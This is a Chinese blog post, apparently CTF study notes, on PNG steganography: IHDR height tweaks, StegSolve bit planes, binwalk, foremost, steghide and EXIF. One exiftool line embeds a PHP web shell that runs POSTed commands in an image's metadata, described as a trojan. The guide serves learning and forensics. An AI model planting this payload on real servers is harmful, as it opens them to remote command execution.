PNG隐写

最新推荐文章于 2023-12-19 19:44:43 发布
最新推荐文章于 2023-12-19 19:44:43 发布
阅读量6.9k 收藏 25
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45086218/article/details/114960410
版权

文章目录

One PieNG 等题目为例,分析PNG隐写姿势

二维码

在这里插入图片描述

IHDR

文件头
在这里插入图片描述
文件尾
在这里插入图片描述

调整图片高度

在这里插入图片描述
修改高度
在这里插入图片描述
在这里插入图片描述
在8神的png隐写中,需要改的高度更高
可以直接把0改成9,其实可以无脑增大,显示不影响
在这里插入图片描述

StegSolve

StegSolve使用方法

在Blue通道找到隐写
在这里插入图片描述

File Format

在这里插入图片描述

Data Extract

RGB是红绿蓝 但他们的值代表的实际上是亮度

R的数字越大,则代表红色亮度越高;R的数字越小,则代表红色亮度越低。G,B同理

R的亮度各有256个级别,GB同理。即从0到255,合计为256个。从数字0到255的逐渐增高,我们人眼观察到的就是亮度越来越大,红色、绿色或蓝色越来越亮。然而256是2的8次方
所以你会看见上图的7~0 一共8个通道

而Alpha就是透明度 该通道用256级灰度来记录图像中的透明度信息,定义透明、不透明和半透明区域

alpha的值为0就是全透明,alpha 的值为 255 则表示不透明

因此左半部分就理解了

右半部分就是Extra By(额外的)和Bit Order(位顺序)和Bit Plane Order(位平面的顺序)

1).Extra By(额外的):分为row(行)和column(纵)

每个像素用R,G,B三个分量表示,那么一张图片就像一个矩阵,矩阵的每个单位就是(0255,0255,0~255)

也就会有是纵排列和行排列了,一般事先访问行再访问列(如果相反会引起ve使用方法)

2).Bit Order(位顺序):MSB是一串数据的最高位,LSB是一串数据的最低位。

3).Bit Plane Order(位平面的顺序)

整个图像分解为8个位平面,从LSB(最低有效位0)到MSB(最高有效位7)随着从位平面0 到位平面7,位平面图像的特征逐渐变得复杂,细节不断增加。(一般我们的图片如果是RGB那么就是24位 3乘8嘛)

4)Bit Plane Order(位平面的顺序):一般图片是24位 也就是3个8 大家可以想像成三明治 比如BGR就是B为三明治第一层
G为第二层 R为第三层。

在这里插入图片描述
考虑纵列:尝试去掉一些通道
在这里插入图片描述
遇到明显的问题可以猜猜看在7通道的隐写
在这里插入图片描述
在这里插入图片描述
分析不同通道间的隐写长度
在这里插入图片描述 在这里插入图片描述 在这里插入图片描述
1,2通道宽度更大
在这里插入图片描述
Save Bin解压即可

Frame Browser

Stegsolve打开gif,一帧一帧看
在这里插入图片描述

EXIF

exiftool支持图片EXIF信息查询,修改及批量操作
在这里插入图片描述
还支持其它文件的EXIF操作
例:为一个图片生成图片码,图片码为我们的木马

exiftool poc.jpg -documentname="<?php echo exec(\$_POST['cmd']); ?>"

EXIF在线工具

在这里插入图片描述

Binwalk

binwalk -e png

在这里插入图片描述

Foremost

有时候binwalk并不好用
在这里插入图片描述

Steghide

隐藏文件
steghide embed -cf [图片文件载体] -ef [待隐藏文件]

steghide embed -cf 1.jpg -ef 1.txt

查看图片中嵌入的文件信息

steghide info 1.jpg

提取图片中隐藏的文件

steghide extract -sf 1.jpg

PNGdebugger

在这里插入图片描述

TweakPNG

可以查看或修改图片信息
在这里插入图片描述

在这里插入图片描述

Skn1fe
关注
  • 5
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新从CTF比赛真题中学习压缩包伪加密与图片隐写术(2)
2401_84584682的博客
05-03 499
现在能在网上找到很多很多的学习资源,有免费的也有收费的,当我拿到1套比较全的学习资源之前,我并没着急去看第1节,我而是去审视这套资源是否值得学习,有时候也会去问一些学长的意见,如果可以之后,我会对这套学习资源做1个学习计划,我的学习计划主要包括规划图和学习进度表。说明需要密码,但是题中没有任何密码提示,ctf中不可能让你无脑爆破,因为时间是有限的,但也有可能是弱口令,反正无从下手先爆破一下试试呗。图片隐写的方式很多样,用到的工具也多,文件名已经提示的很明显了,是png隐写,所以朝着这方面想就行了。
隐写术-PNG文件隐写(一)
qq_44636090的博客
11-22 3575
PNG隐写(一)PNG文件格式1. PNG文件头标识2. IHDR(文件头)数据块3. PLTE(调色板)数据块4. IDAT(图像数据块)5. IEND(图像结束数据块) PNG文件格式 PNG文件主要由一些数据块组成 png的主要数据块包括: 1. PNG文件头标识 占8个字节 标识png文件 常为:89 50 4E 47 0D 0A 1A 0A 2. IHDR(文件头)数据块 IHDR文件头数据块主要包括4部分 ·Length(长度) 4字节 指定数据块中数据域的长度,其长度不超过(231−1)(
隐写术——PNG文件隐藏payload
sxr__nc的博客
09-17 1712
隐写术——PNG文件
从0开始学杂项 第三期:隐写分析(2) PNG 图片隐写
CHTXRT的博客
01-17 4953
主要讲了讲 CTF 隐写分析中的 PNG 图片隐写
png隐写
Starr
03-01 3295
文章目录1. PNG格式2. 功能设计3. 读取并解析png验证magic解析main4. 编码payload 隐写:将信息植入其它数据,并可以提取出来。 仅关键逻辑提供源码。 1. PNG格式 PNG官网介绍了png的文件格式,可供参考。 也可以用010editor的png模板。 简述一下,首先是8字节magic: 89 50 4E 47 0D 0A 1A 0A 直接用uint64表示即可: type Header struct { magic uint64 // 0:8 } 然后是块(chunk
PNG隐写的简单实战教程(CRC爆破,MSB隐写,binwalk分离)
最新发布
ttovlove_的博客
12-19 4236
PNG(Portable Network Graphics)是一种无损压缩的图像文件格式,具有开放标准。PNG文件的基本结构由文件头、图像数据和文件尾三个部分组成。
图片隐写笔记
Pompey_wp的博客
09-17 602
因为人眼对颜色的分辨有限度,所以可以更改图片的每个像素点的颜色比特的最低位来隐藏信息,但不被人眼分辨出来。库中的内置方法转换(因为运算方法确定),而不使用 Ps 等软件来转换色彩模式(过于复杂,不易操控,会损失低位数据)中支持 11 种图片模式:1、L、P、RGB、RGBA、CMYK、YCbCr、LAB、HSV、I、F。因为 lsb 的原理是提取视觉影响弱的低位,所以要求转换必须完全精准,一般都采用。png 的文件头记录了图片的大小,超过大小的数据将不会出现在图片里。针对第一种情况,也可以利用。
CTF-bugku-misc-[隐写3]-png高度隐写pngCRC校验
m0_43405474的博客
03-08 6010
CTF-bugku-misc-[隐写]-png高度隐写pngCRC校验1.题目2.png文件结构分析3.改变图片的高度+CRC校验4.修复图片获得flag 看很多教程都教直接改高度恢复图片拿到flag,但是我尝试了很久,并不奏效。 特定记录了一下自己探索的过程。 1.题目 一张名为dabai的png图片,但是不能正常打开。 打开的时候提示CRC校验错误: 思路:恢复图片拿到flag 2.png文件结构分析 首先来详细的分析一下png的存储结构主要关注头部。 (1). png的文件头:8个字节 89 5
StegX:隐写术(BMP,PNG,WAV,MP3,AVI,FLV)
05-13
StegX是一种隐写术应用程序。 它允许以各种文件格式(例如图像,声音或视频)隐藏数据。 因此,隐藏的数据可以通过不安全的信道发送而不会被发现,然后接收器可以提取它们。 该应用程序包含一个图形界面和一个命令行...
隐写术:这是一个程序,用于解密和查找.png图片中的隐藏照片和文本。
02-17
它旨在克服将信息隐藏在png文件的颜色通道的特定位中的隐写策略(基于LSB的图像隐写术)。 您可以使用这些库来获取信息,该信息以任何顺序按颜色通道的任何组合的任何位组合进行编码。 它旨在用作从未知和不熟悉的...
将文件内容隐藏在png图片中
11-19
将文件内容隐藏在png图片中,高能装b技能
CTF隐写详细总结,自带ctf工具集
11-30
CTF隐写详细总结,自带ctf工具集。 0、图片隐写 1、音频隐写 波形隐写 频谱隐写 LSB隐写 2、视频隐写 3、Base64隐写 4、Python代码隐写 5、Pdf隐写 6、Office文档隐写 7、Ntfs数据流隐写
隐写术总结.docx
10-31
隐写术总结几种方式总结 利用LSB(最低有效位)来进行隐写 原理:图片的像素由三种颜色...例如:在.png图片的存储中,每个颜色会有8bit,LSB隐写就是修改了像数中最低的1bit,在人眼看来是看不出区别的,也就隐藏了信息
PNG隐写入门赛 WP
xiaopangding09的博客
05-28 987
一篇思路乱七八糟的wp 这个比赛是大概3月份ctfshow的一个比赛,额,最近在复盘之前各个比赛,比较菜,请见谅。 0、本场比赛共有18题,但只有1个附件文件(见第1题),所有flag均可以从附件中获取; 1、所有的flag开头和结尾均为#,中间由字母、数字或下划线组成; 2、本场比赛不使用任何可以设置密码的隐写方法,包括可以将密码留空的隐写方法; 3、原理类似的隐写方法在确保不互相干扰的前提下可能会以多种方式使用; 4、如果从附件提取的隐写信息为字符串形式,可能需要转码得到指定格式的结果; 5、如果从附
Misc 学习 - 隐写分析:PNG 图片隐写
qq_41146932的博客
07-23 1171
我们重新用 Winhex 打开图片,搜索“IDAT”找到最后一个 IDAT 块,把里面的数据(只要数据,不要长度位、“IDAT”和那4位 CRC )复制到新文件里(CRC 是我瞎写的,所以上面会报错),保存成1.txt(没错,为了偷懒我压根没压缩成 zlib,你用 binwalk 是分离不出来的)。),它由第11——32字节组成(从0开始),包含有 PNG 文件中存储的图像数据的基本信息,数据从第 16字节开始,有13个字节,其前8字节分别用4个字节规定了图片的宽和高(十六进制,以像素为单位)。
CTFshow misc PNG隐写入门赛
m0_62905261的博客
05-04 1113
CTFshow misc PNG隐写入门赛
PNG图片格式及隐写
nginx123的博客
09-02 6718
一个PNG图片的格式如下 PNG图片固定以 89 50 4E 47 0D 0A 1A 0A (4个字节)开头 接下来是IHDR区,这个区标识着PNG文件的属性参数,如长宽、色彩模式等,具体如下: 08-0B:4个字节标识IHDR区的大小(注意是去掉tag和crc32后的大小),这里为00 00 00 0D,即13个字节。 0C-0F:4个字节,固定为49 48 44 52(IHDR) 标识该区为IHDR区 10-13:4个字节,图片宽度,此处为0x800=2048像素 14-17:4个字节,图片高度,此
0x001图片隐写png高度隐藏+复合图片
热门推荐
神谕恋红尘
06-25 1万+
题目链接:https://pan.baidu.com/s/1hXG2425FtgzA3H8Mjr5J2g 密码:3lmxPNG格式参考:https://www.cnblogs.com/lidabo/p/3701197.htmlPNG的文件结构PNG数据块(Chunk)PNG定义了两种类型的数据块,一种是称为关键数据块(critical chunk),这是标准的数据块,另一种叫做辅助数据块(anci...
CTF_StegSolve使用方法
weixin_52620919的博客
08-12 7821
Stegsolve使用方法 这个没什么好说的 打开文件 保存 退出 在分析里面从上到下的依次意思是 File Format:文件格式 Data Extract:数据提取 Steregram Solve:立体试图 可以左右控制偏移 Frame Browser:帧浏览器 Image Combiner:拼图,图片拼接 用法(使用场景) 1.File Format: 这里你会看见图片的具体信息有时候有些图片隐写的flag会藏在这里 2.Data Extract: 好多涉及到数据提取的时候,很多博主
ctf png图片隐写
10-17
好的,针对您的问题,我可以给出以下思路: 1. 首先,可以使用一些工具来查看图片的元数据信息,例如使用exiftool或者exiv2等工具。如果图片中有隐藏的信息,可能会在元数据中留下痕迹。 2. 其次,可以使用一些隐写术分析工具,例如stegdetect、steghide等工具,来检测图片中是否有隐藏的信息。 3. 如果以上方法都无法找到隐藏的信息,那么可能需要进行手动分析。可以使用一些图像处理软件,例如Photoshop、GIMP等,来查看图片的像素值是否有异常。也可以尝试将图片转换为二进制格式,然后查看其中是否有隐藏的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值